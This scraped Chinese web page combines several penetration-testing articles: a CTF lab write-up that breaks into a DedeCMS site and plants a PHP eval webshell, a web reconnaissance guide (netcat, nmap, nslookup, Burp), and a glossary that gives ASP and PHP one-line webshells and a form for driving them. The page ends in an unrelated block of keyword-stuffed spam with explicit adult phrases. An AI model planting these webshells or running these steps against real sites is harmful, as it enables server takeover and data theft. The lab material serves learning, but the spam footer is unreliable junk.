整合營(yíng)銷(xiāo)服務(wù)商

          電腦端+手機(jī)端+微信端=數(shù)據(jù)同步管理

          免費(fèi)咨詢(xún)熱線(xiàn):

          滲透測(cè)試-真的很簡(jiǎn)單

          滲透測(cè)試-真的很簡(jiǎn)單

          僅供學(xué)習(xí),禁止用于違法行為。請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,如因此產(chǎn)生的一切不良后果與文章作者和本公眾號(hào)無(wú)關(guān)。

          題目地址

          https://www.ichunqiu.com/experiment/detail?id=51123&source=1&otype=1

          題目要求

          要求獲取目標(biāo)網(wǎng)站的FLAG信息

          開(kāi)啟環(huán)境后的頁(yè)面


          根據(jù)提示,我們?cè)L問(wèn)http://file.ichunqiu.com/49ba59ab下載dedeCMS,下載下來(lái)是一個(gè)一鍵爆賬號(hào)密碼的軟件

          輸入目標(biāo)地址http://www.test.ichunqiu爆破

          得到賬號(hào)和密碼MD5值

          對(duì)加密MD5值進(jìn)行解密

          在線(xiàn)MD5解密:https://www.somd5.com/

          得到密碼:only_system

          有賬號(hào)密碼。但是后臺(tái)地址不知道,進(jìn)行后臺(tái)目錄掃描

          環(huán)境中tools里自帶了很多的工具,這里找到目錄掃描的工具

          這里使用御劍后臺(tái)掃描工具

          對(duì)每個(gè)地址進(jìn)行查看,發(fā)現(xiàn),并沒(méi)有我們想要的后臺(tái),嘗試更換字典或掃描器進(jìn)行掃描,發(fā)現(xiàn)還是沒(méi)有后臺(tái)地址

          百度找織夢(mèng)cms后臺(tái)的方法

          日志暴露后臺(tái)地址

          https://blog.csdn.net/forest_fire/article/details/50944689

          發(fā)現(xiàn)可以從報(bào)錯(cuò)文件 /data/mysql_error_trace.inc/data/mysqli_error_trace.inc 中,可得到泄露的后臺(tái)路徑,我們?cè)L問(wèn)

          http://www.test.ichunqiu/data/mysql_error_trace.inc 發(fā)現(xiàn)有個(gè)目錄

          進(jìn)行訪(fǎng)問(wèn),發(fā)現(xiàn)就是后臺(tái)地址

          輸入賬號(hào)密碼進(jìn)行登錄,成功進(jìn)入后臺(tái)

          下一步我們需要上傳webshell,獲取主機(jī)權(quán)限。

          百度進(jìn)行查找獲取webshell方法

          https://www.cnblogs.com/milantgh/p/3634550.html

          在后臺(tái)界面,我們看到在模板-->標(biāo)簽源碼管理處可以進(jìn)行增加一個(gè)新的標(biāo)簽,也可以對(duì)現(xiàn)有的便簽進(jìn)行編輯

          這里,我們對(duì)現(xiàn)有的標(biāo)簽進(jìn)行編輯寫(xiě)入一句話(huà),保存

          <?php @eval($_POST['lemonlove7']); ?>

          上面也有提示,文件的存放位置

          訪(fǎng)問(wèn)一下,使用環(huán)境中自帶的菜刀進(jìn)行連接

          成功獲取到shell

          在c盤(pán)Documents and Settings(文件和設(shè)置) -->Administrator-->桌面看到了flag~ichunqiu.txt文件

          進(jìn)行查看,發(fā)現(xiàn)是空的,但文件大小不為0

          在cmd命令中使用type進(jìn)行查看看看 ,發(fā)現(xiàn)是拒絕訪(fǎng)問(wèn),哎,肯定是權(quán)限不夠

          使用whoami查看我們現(xiàn)在的用戶(hù)權(quán)限

          whoami

          發(fā)現(xiàn)我們的全是system即為最高權(quán)限,但是卻還是看不falg~ichunqiu.txt,進(jìn)行百度發(fā)現(xiàn)可能是對(duì)文件的權(quán)限進(jìn)行了設(shè)置

          windows下設(shè)置文件及其文件夾權(quán)限的方法:https://www.jb51.net/article/51907.htm

          使用cacls命令對(duì)falg~ichunqiu.flag文件權(quán)限進(jìn)行查看,發(fā)現(xiàn)對(duì)system用戶(hù)的權(quán)限是n即為無(wú)權(quán)限

          cacls flag~ichunqiu.txt

          使用cacls命令對(duì)falg~ichunqiu.flag文件權(quán)限進(jìn)行修改為F

          cacls flag~ichunqiu.txt /E /P system:F /C

          成功的拿到flag

          type flag~ichunqiu.txt

          結(jié)尾

          和師傅們一起成長(zhǎng),努力學(xué)習(xí)網(wǎng)絡(luò)安全知識(shí)。

          文章來(lái)源:鵬組安全

          如有侵權(quán),請(qǐng)聯(lián)系我們進(jìn)行刪除

        1. 息收集
        2. 配置和部署管理測(cè)試
        3. 身份管理測(cè)試
        4. 認(rèn)證測(cè)試
        5. 授權(quán)測(cè)試
        6. 會(huì)話(huà)管理測(cè)試
        7. 輸入驗(yàn)證測(cè)試
        8. 錯(cuò)誤處理測(cè)試
        9. 弱密碼測(cè)試
        10. 業(yè)務(wù)邏輯測(cè)試
        11. 客戶(hù)端測(cè)試

        12. 文章目錄

          • 1. 利用搜索引擎發(fā)現(xiàn)和偵察信息泄露
          • 2. web服務(wù)器指紋
          • 3. 查看web 服務(wù)器元文件發(fā)現(xiàn)信息泄漏測(cè)試方法1:Robots.txt測(cè)試方法2:meta tag
          • 4.枚舉web 服務(wù)器上的應(yīng)用程序
          • 5. 審查網(wǎng)頁(yè)評(píng)論和信息泄露的元數(shù)據(jù)
          • 6. 確認(rèn)程序入口
          • 7. 通過(guò)應(yīng)用程序映射執(zhí)行路徑
          • 8. web 應(yīng)用程序指紋和web 應(yīng)用程序框架
          • 原文鏈接

          1. 利用搜索引擎發(fā)現(xiàn)和偵察信息泄露

          測(cè)試對(duì)象:testphp.vulnweb.com

          嘗試在谷歌中搜索:“site: testphp.vulnweb.com”,得到基本的爬蟲(chóng)結(jié)果如下:

          使用查詢(xún)發(fā)現(xiàn)了更多有用的信息:

          參考

          http://www.mrjoeyjohnson.com/Google.Hacking.Filters.pdf

          2. web服務(wù)器指紋

          Web 服務(wù)器指紋是滲透測(cè)試的關(guān)鍵任務(wù)。了解正在運(yùn)行的 web 服務(wù)器的版本和類(lèi)型能夠讓測(cè)試人員確定已知的漏洞以及在測(cè)試過(guò)程中使用適當(dāng)?shù)姆椒ā?/p>

          a)黑盒測(cè)試:

          確認(rèn)web 服務(wù)器身份的最簡(jiǎn)單最基本的方式是利用netcat查看 HTTP 響應(yīng)報(bào)頭中的服務(wù)器字段。

          b)測(cè)試對(duì)象:

          nc google.com 80

          GET

          / HTTP/1.1

          Host: google.com

          enter

          enter

          c)自動(dòng)測(cè)試工具:

          httprint, Burpsuite

          d)在線(xiàn)測(cè)試:

          https://www.netcraft.com/

          e)示例:

          • netcat結(jié)果如下:

          • 當(dāng)然,我們也可以使用瀏覽器的一些拓展:

          • 在線(xiàn)解決方案:

          參考

          • http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/
          • https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
          • http://netcat.sourceforge.net.
          • https://www.darknet.org.uk/2007/09/httprint-v301-web-server-fingerprinting-tool-download/
          • http://www.net-square.com/httprint.html

          3. 查看web 服務(wù)器元文件發(fā)現(xiàn)信息泄漏

          測(cè)試方法1:Robots.txt

          網(wǎng)絡(luò)蜘蛛/機(jī)器人/爬蟲(chóng)檢索 (訪(fǎng)問(wèn)) 一個(gè)網(wǎng)頁(yè), 然后遞歸遍歷超鏈接, 以檢索進(jìn)一步的 web 內(nèi)容。他們的行為是由web根目錄中robots.txt文件的Robots Exclusion Protocol指定的。

          測(cè)試對(duì)象:abc.com/robots.txt

          工具: 利用wget(例如: wget http://google.com/robots.txt)

          參考:http://www.robotstxt.org/

          示例:http://local/mutillidae/robots.txt

          測(cè)試方法2:meta tag

          Tag位于每個(gè) HTML 文檔的 HEAD 部分, 并且應(yīng)該在一個(gè) web 站點(diǎn)上的下述事件中保持一致:機(jī)器人/蜘蛛/爬蟲(chóng)的起始點(diǎn)不是從 webroot 以外的文檔鏈接開(kāi)始的。

          網(wǎng)絡(luò)蜘蛛/機(jī)器人/爬蟲(chóng)可以故意忽略 “<META NAME=”ROBOTS”>” tag。

          工具: BurpSuite

          4.枚舉web 服務(wù)器上的應(yīng)用程序

          a) url:

          • http://www.example.com/webmail·
          • http://mail.example.com/

          b) 端口:

          最基本和最簡(jiǎn)單的方法是使用端口掃描儀 (如 nmap)。例如:

          nmap 0-65535 192.168.1.1

          c) 域名:

          • 有許多方法可以用來(lái)確定DNS名稱(chēng)給給定的IP, 其中一個(gè)是nslookup。

          cmd

          nslookup

          all

          set type=all

          example.com

          • 基于Web的 DNS 搜索:

          http://searchdns.netcraft.com/?host

          • Reverse IP

          -Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (require free

          membership)

          – MSN search: http://search.msn.com syntax: “ip:x.x.x.x” (without the quotes) o webhosting info: http://whois.webhosting.info/

          -DNSstuff: http://www.dnsstuff.com/

          d) 谷歌hack技術(shù)

          示例:

          • nmap:

          • nslookup

          e) 工具

          • nslookup, dig
          • Port scanner: nmap http://www.insecure.org
          • Nessus Vulnerability Scanner. http://www.nessus.org
          • Search engine: shodan.io, google.

          5. 審查網(wǎng)頁(yè)評(píng)論和信息泄露的元數(shù)據(jù)

          對(duì)于程序員來(lái)說(shuō), 在源代碼中添加詳細(xì)注釋和元數(shù)據(jù)是非常普遍的,甚至是推薦的。但是, HTML 代碼中包含的注釋和元數(shù)據(jù)可能會(huì)對(duì)潛在攻擊者暴露內(nèi)部信息。應(yīng)對(duì)源代碼中的注釋和元數(shù)據(jù)進(jìn)行審查以確定是否泄露了任何信息。

          工具:

          • Wget
          • 任何瀏覽器

          6. 確認(rèn)程序入口

          請(qǐng)求:

          • 確認(rèn)GETs和POST的位置
          • 確認(rèn)POST 請(qǐng)求中使用的所有參數(shù)(包括隱藏參數(shù)和非隱藏參數(shù))
          • 確認(rèn)GETs請(qǐng)求中使用的所有參(通常在?之后)
          • 確認(rèn)查詢(xún)字符串的所有參數(shù)
          • 注意參數(shù), 即使編碼或加密, 并確定哪些帳戶(hù)由哪些應(yīng)用程序處理。

          響應(yīng):

          • 確認(rèn)并記下任何header
          • 確認(rèn)哪里有重定向(300 HTTP 狀態(tài)代碼),400 狀態(tài)代碼, 403 禁用和500內(nèi)部服務(wù)器錯(cuò)誤。

          工具:

          • 攔截代理: Burpsuite, paros, webscarab,…
          • 瀏覽器插件: Tamper data on firefox,…

          一些注意事項(xiàng):

          • 為了發(fā)現(xiàn)隱藏的參數(shù), 可以使用Burpsuit的以下選項(xiàng):

          • 使用Burpsuite 和狀態(tài)代碼來(lái)查找它們

          • 使用Burpsuit捕獲請(qǐng)求參數(shù)和響應(yīng)頭

          7. 通過(guò)應(yīng)用程序映射執(zhí)行路徑

          在開(kāi)始安全測(cè)試之前, 了解應(yīng)用程序的結(jié)構(gòu)是至關(guān)重要的。如果不徹底了解應(yīng)用程序的布局, 就不可能對(duì)其進(jìn)行徹底的測(cè)試。

          a)測(cè)試目的

          • 映射目標(biāo)應(yīng)用程序并了解主要工作流

          b)自動(dòng)蜘蛛工具

          • Burpsuit
          • ZAP

          c)自動(dòng)化蜘蛛示例

          8. web 應(yīng)用程序指紋和web 應(yīng)用程序框架

          Web 框架指紋是信息采集過(guò)程中的一個(gè)重要子任務(wù)。了解框架的類(lèi)型會(huì)有很大的優(yōu)勢(shì),特別是當(dāng)這種類(lèi)型已經(jīng)被滲透測(cè)試過(guò)。不僅是版本中已知的漏洞使得指紋處理如此重要, 框架以及已知文件結(jié)構(gòu)中的特定錯(cuò)誤同樣如此。

          a) 黑盒測(cè)試

          為了定義當(dāng)前框架, 有幾個(gè)最常見(jiàn)的位置可供查找

          • HTTP 標(biāo)頭
          • cookie
          • HTML 源代碼
          • 特定文件和文件夾

          b) HTTP 標(biāo)頭

          • 標(biāo)識(shí) web 應(yīng)用程序框架的最基本形式是查看 HTTP 響應(yīng)標(biāo)頭中的 X-Powered-By 字段。

          c) Cookies

          確定當(dāng)前 web 框架的另一個(gè)類(lèi)似的、更可靠的方法是特定框架的 cookie。

          d) HTML 源代碼

          此技術(shù)基于在 HTML 頁(yè)面源代碼中查找某些模式。我們可以找到很多信息, 幫助測(cè)試人員識(shí)別特定的 web 應(yīng)用程序。

          e)特定文件和文件夾

          每個(gè)應(yīng)用程序在服務(wù)器上都有自己的特定文件和文件夾結(jié)構(gòu)。我們可以使用工具或手動(dòng)訪(fǎng)問(wèn)它們。

          f)Dirbusting 示例

          • 谷歌黑客技術(shù)

          https://www.exploit-db.com/ghdb/4675/

          • BurpSuite 入侵

          g)常見(jiàn)應(yīng)用程序標(biāo)識(shí)符

          h)Nikto

          i)Whatweb

          原文鏈接

          https://packetstormsecurity.com/files/download/146830/web-application-security-testing.pdf

          來(lái)也慚愧,菜鳥(niǎo)小白已經(jīng)干了三年安全產(chǎn)品的測(cè)試,但是對(duì)于滲透測(cè)試都不曾好好了解,一直停留在基礎(chǔ)功能測(cè)試和自動(dòng)化測(cè)試的摸索上。正好我們組內(nèi)在組織滲透測(cè)試的全套課程學(xué)習(xí),將會(huì)從最基礎(chǔ)的內(nèi)容開(kāi)始學(xué)起,學(xué)習(xí)的內(nèi)容菜鳥(niǎo)小白也會(huì)整理出來(lái),一起分享。

          今天我們一起來(lái)看看一些基礎(chǔ)概念吧。

          基礎(chǔ)概念

          1、腳本(asp、php、jsp)

          ASP:ASP即Active Server Pages,是Microsoft公司開(kāi)發(fā)的服務(wù)器端腳本環(huán)境,可用來(lái)創(chuàng)建動(dòng)態(tài)交互式網(wǎng)頁(yè)并建立強(qiáng)大的web應(yīng)用程序。當(dāng)服務(wù)器收到對(duì)ASP文件的請(qǐng)求時(shí),它會(huì)處理包含在用于構(gòu)建發(fā)送給瀏覽器的HTML(Hyper Text Markup Language,超文本標(biāo)記語(yǔ)言)網(wǎng)頁(yè)文件中的服務(wù)器端腳本代碼。除服務(wù)器端腳本代碼外,ASP文件也可以包含文本、HTML(包括相關(guān)的客戶(hù)端腳本)和com組件調(diào)用。

          PHP:PHP即“超文本預(yù)處理器”,是一種通用開(kāi)源腳本語(yǔ)言。PHP是在服務(wù)器端執(zhí)行的腳本語(yǔ)言,與C語(yǔ)言類(lèi)似,是常用的網(wǎng)站編程語(yǔ)言。

          JSP:JSP(全稱(chēng)JavaServer Pages)是由Sun Microsystems公司主導(dǎo)創(chuàng)建的一種動(dòng)態(tài)網(wǎng)頁(yè)技術(shù)標(biāo)準(zhǔn)。JSP部署于網(wǎng)絡(luò)服務(wù)器上,可以響應(yīng)客戶(hù)端發(fā)送的請(qǐng)求,并根據(jù)請(qǐng)求內(nèi)容動(dòng)態(tài)地生成HTML、XML或其他格式文檔的Web網(wǎng)頁(yè),然后返回給請(qǐng)求者。

          2、html(css、js、html)

          html:HTML稱(chēng)為超文本標(biāo)記語(yǔ)言,是一種標(biāo)識(shí)性的語(yǔ)言。它包括一系列標(biāo)簽.通過(guò)這些標(biāo)簽可以將網(wǎng)絡(luò)上的文檔格式統(tǒng)一,使分散的Internet資源連接為一個(gè)邏輯整體。HTML文本是由HTML命令組成的描述性文本,HTML命令可以說(shuō)明文字,圖形、動(dòng)畫(huà)、聲音、表格、鏈接等。

          3、HTTP協(xié)議

          HTTP:http是一個(gè)簡(jiǎn)單的請(qǐng)求-響應(yīng)協(xié)議,它通常運(yùn)行在TCP之上。它指定了客戶(hù)端可能發(fā)送給服務(wù)器什么樣的消息以及得到什么樣的響應(yīng)。請(qǐng)求和響應(yīng)消息的頭以ASCII碼形式給出;而消息內(nèi)容則具有一個(gè)類(lèi)似MIME的格式。

          4、CMS(B/S)

          CMS:內(nèi)容管理系統(tǒng)(content management system,CMS),我們這邊一般使用的B/S架構(gòu),也就是瀏覽器訪(fǎng)問(wèn)的方式。另外還有一種C/S架構(gòu),就是通過(guò)應(yīng)用程序的訪(fǎng)問(wèn)方式。

          5、MD5

          MD5:MD5信息摘要算法(英語(yǔ):MD5 Message-Digest Algorithm),一種被廣泛使用的密碼散列函數(shù),可以產(chǎn)生出一個(gè)128位(16字節(jié))的散列值(hash value),用于確保信息傳輸完整一致。滲透測(cè)試中一般密碼的解碼需要使用。

          6、其它概念

          肉雞:被黑客入侵并被長(zhǎng)期駐扎的計(jì)算機(jī)或服務(wù)器

          抓雞:利用使用量大的程序的漏洞,使用自動(dòng)化方式獲取肉雞的行為

          webshell:通過(guò)web入侵的一種腳本工具,可以據(jù)此對(duì)網(wǎng)站服務(wù)進(jìn)行一定程度的控制

          漏洞:硬件、軟件、協(xié)議等可利用的安全缺陷,可能被攻擊者利用,對(duì)數(shù)據(jù)進(jìn)行篡改、控制等。

          一句話(huà)木馬:通過(guò)向服務(wù)器提交一句簡(jiǎn)短的代碼,配合本地客戶(hù)端實(shí)現(xiàn)webshell功能的木馬。

          舉例:

          <%eval request("pass")%>

          <%execute(request("pass"))%>

          其中request("pass")接收客戶(hù)端提交的數(shù)據(jù),pass為執(zhí)行命令的參數(shù)值。

          eval/execute,函數(shù)執(zhí)行客戶(hù)端命令的內(nèi)容

          又如:PHP的一句話(huà)木馬

          <?php eval($_POST[123]);?>

          下面的代碼可以用POST的方式提交PHP語(yǔ)句,利用php腳本的各種函數(shù),就可以實(shí)現(xiàn)執(zhí)行系統(tǒng)命令、修改數(shù)據(jù)庫(kù)、增刪改查等各種功能。

          <form method=post action=http://木馬地址>

          <textarea name=123>

          //這里寫(xiě)PHP代碼

          phpinfo();

          </textarea>

          <input type=submit>

          </form>

          提權(quán):操作系統(tǒng)低權(quán)限的賬戶(hù)將自己提升為管理員權(quán)限使用的方法。

          后門(mén):黑客為了對(duì)主機(jī)進(jìn)行長(zhǎng)期的控制沒(méi)在機(jī)器上種植的一段程序或留下的一個(gè)“入口”

          跳板:使用肉雞IP來(lái)實(shí)施攻擊其他目標(biāo),以便更好的隱藏自己的身份信息

          旁站:同一個(gè)物理服務(wù)器下搭建的多個(gè)網(wǎng)站。如:服務(wù)器下有三個(gè)網(wǎng)站A、B、C,B和C就是A的旁站。

          旁站入侵:即同服務(wù)器下的網(wǎng)址入侵,入侵之后可以通過(guò)提權(quán)跨目錄等手段拿到目標(biāo)網(wǎng)址的權(quán)限。常見(jiàn)的旁站查詢(xún)工具有:WebRobot、御劍、明小子和web在線(xiàn)查詢(xún)等。

          C段入侵:即同C段下服務(wù)器入侵。如目標(biāo)IP為192.168.1.253入侵192.168.1.*的任意一臺(tái)機(jī)器,然后利用一些黑客工具嗅探獲取在網(wǎng)上傳輸?shù)母鞣N信息。常用的工具有:Cain(Windows)、Sniffit(UNIX)、Snoop、tcpdump、dsniff等

          滲透測(cè)試

          黑盒測(cè)試:在未授權(quán)的情況,模擬黑客的攻擊方法和思維方式,來(lái)評(píng)估計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)可能存在的安全風(fēng)險(xiǎn)。黑盒測(cè)試考驗(yàn)的是綜合能力(OS、database、script、code、思路和社工)。

          白盒測(cè)試:從內(nèi)部發(fā)起,偏向于代碼審計(jì)

          APT攻擊:Advanced Persistent Threat,高級(jí)可持續(xù)性攻擊,是指組織(特別是政府)或者小團(tuán)體利用先進(jìn)的攻擊手段對(duì)特定目標(biāo)進(jìn)行長(zhǎng)期持續(xù)性網(wǎng)絡(luò)攻擊的攻擊形式,具有以下特點(diǎn):

          1.極強(qiáng)的隱蔽性

          2.潛伏期長(zhǎng),持續(xù)性強(qiáng)

          3.目標(biāo)性強(qiáng)

          滲透測(cè)試的特點(diǎn)

          充滿(mǎn)挑戰(zhàn)與刺激;

          思路和經(jīng)驗(yàn)積累往往決定成敗;

          滲透測(cè)試的流程

          滲透測(cè)試:更全面的找出服務(wù)器的問(wèn)題,更傾向于保護(hù)

          明確目標(biāo)——信息收集——漏洞探測(cè)——漏洞驗(yàn)證——信息分析——獲取所需——信息整理——形成報(bào)告

          明確目標(biāo):范圍、規(guī)則、需求

          信息收集:基礎(chǔ)、系統(tǒng)、應(yīng)用、版本(版本漏洞)、服務(wù)、人員(密碼破解)、防護(hù)

          漏洞探測(cè):系統(tǒng)漏洞、webserver漏洞、web應(yīng)用漏洞、其它端口服務(wù)漏洞、通信安全

          漏洞驗(yàn)證:自動(dòng)化驗(yàn)證、手工驗(yàn)證、試驗(yàn)驗(yàn)證、登錄猜測(cè)、業(yè)務(wù)漏洞驗(yàn)證、公開(kāi)資源的利用

          信息分析:精準(zhǔn)打擊、繞過(guò)防御機(jī)制、定制攻擊路徑、繞過(guò)檢測(cè)機(jī)制、繞過(guò)代碼

          獲取所需:實(shí)施攻擊、獲取內(nèi)部信息、進(jìn)一步滲透、持續(xù)性存在*、清理痕跡

          信息整理:整理滲透工具、整理收集信息、整理

          形成報(bào)告:按需整理、補(bǔ)充介紹、修補(bǔ)建議


          如果可以的話(huà),請(qǐng)幫忙點(diǎn)擊下方廣告,給菜鳥(niǎo)小白眾籌一點(diǎn)電費(fèi),謝謝~


          主站蜘蛛池模板: 国产成人午夜精品一区二区三区| 国产香蕉一区二区在线网站| 国产一区二区三区免费视频| 人妻内射一区二区在线视频| 亚洲片一区二区三区| 在线精品国产一区二区三区| 亚洲一区二区三区夜色| 暖暖免费高清日本一区二区三区| 国产一区二区三区在线观看免费| 中文字幕AV一区中文字幕天堂| 中文字幕精品一区二区2021年| 精品女同一区二区三区免费播放 | 精品一区二区无码AV| 久久国产精品一区免费下载| 国产成人精品亚洲一区| 日产精品久久久一区二区| 视频一区二区在线观看| 国产成人精品日本亚洲专一区 | 91秒拍国产福利一区| 国产成人精品一区二区三在线观看| 中文字幕一区视频一线| 激情无码亚洲一区二区三区 | 免费无码一区二区三区| 一区二区三区免费电影| 中文精品一区二区三区四区| 久久精品国产一区二区三区| 日本v片免费一区二区三区 | www.亚洲一区| 在线视频一区二区三区四区| 高清一区二区三区日本久| 无码精品久久一区二区三区| 精品久久久久久无码中文字幕一区 | 国产在线一区观看| 亚洲一区欧洲一区| 亚洲国产一区国产亚洲| 中文字幕一区二区三区免费视频| 人妻体体内射精一区二区| 日本高清不卡一区| 激情一区二区三区| 又硬又粗又大一区二区三区视频 | 日产亚洲一区二区三区|